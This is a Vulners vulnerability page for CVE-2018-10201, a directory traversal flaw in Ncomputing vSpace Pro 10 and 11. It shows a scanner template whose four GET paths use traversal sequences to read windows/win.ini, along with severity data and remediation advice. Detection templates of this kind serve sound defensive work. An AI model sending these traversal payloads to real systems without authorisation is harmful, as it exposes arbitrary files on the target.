Vulners
Lucene search
Ncomputing vSPace Pro 10 and 11 - Directory Traversal
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | Ncomputing vSpace Pro v10 and v11 - Directory Traversal PoC | 23 Apr 201800:00 | – | zdt |
 | NComputing vSpace Pro NC Monitor Server Directory Traversal Vulnerability | 24 Apr 201800:00 | – | cnvd |
 | CVE-2018-10201 | 20 Apr 201808:00 | – | cve |
 | CVE-2018-10201 | 20 Apr 201808:00 | – | cvelist |
 | Ncomputing vSpace Pro 10/11 - Directory Traversal | 23 Apr 201800:00 | – | exploitdb |
 | Ncomputing vSpace Pro 1011 - Directory Traversal | 23 Apr 201800:00 | – | exploitpack |
 | CVE-2018-10201 | 20 Apr 201808:29 | – | nvd |
 | Generic HTTP Directory Traversal / File Inclusion (Web Root) - Active Check | 18 Apr 201700:00 | – | openvas |
 | CVE-2018-10201 | 20 Apr 201808:29 | – | osv |
 | Ncomputing vSPace Pro 10 / 11 Directory Traversal | 23 Apr 201800:00 | – | packetstorm |
10
id: CVE-2018-10201
info:
name: Ncomputing vSPace Pro 10 and 11 - Directory Traversal
author: 0x_akoko
severity: high
description: Ncomputing vSpace Pro versions 10 and 11 suffer from a directory traversal vulnerability.
impact: |
Successful exploitation of this vulnerability allows an attacker to read arbitrary files from the target system.
remediation: |
Apply the latest security patches or updates provided by Ncomputing to fix the directory traversal vulnerability.
reference:
- https://packetstormsecurity.com/files/147303/Ncomputing-vSPace-Pro-10-11-Directory-Traversal.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-10201
- http://www.kwell.net/kwell_blog/?p=5199
- https://www.kwell.net/kwell/index.php?option=com_newsfeeds&view=newsfeed&id=15&Itemid=173&lang=es
- https://support.ncomputing.com/portal/kb/articles/ncomputing-health-monitor-server-vulnerability-patch
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-10201
cwe-id: CWE-22
epss-score: 0.46058
epss-percentile: 0.98651
cpe: cpe:2.3:a:ncomputing:vspace_pro:10:*:*:*:*:*:*:*
metadata:
max-request: 4
vendor: ncomputing
product: vspace_pro
tags: cve,cve2018,ncomputing,lfi,packetstorm,vuln
http:
- method: GET
path:
- '{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini'
- '{{BaseURL}}/...\...\...\...\...\...\...\...\...\windows\win.ini'
- '{{BaseURL}}/..../..../..../..../..../..../..../..../..../windows/win.ini'
- '{{BaseURL}}/....\....\....\....\....\....\....\....\....\windows\win.ini'
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
# digest: 4a0a0047304502204c38498527ed873b74acfc127e531941d35029f1d0ba65fd8a473c753868ae15022100ebd2d5c5936c31889c55182d05f805546be43e42f2504f70df539655ec1790db:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 25
CVSS 37.5
EPSS0.46058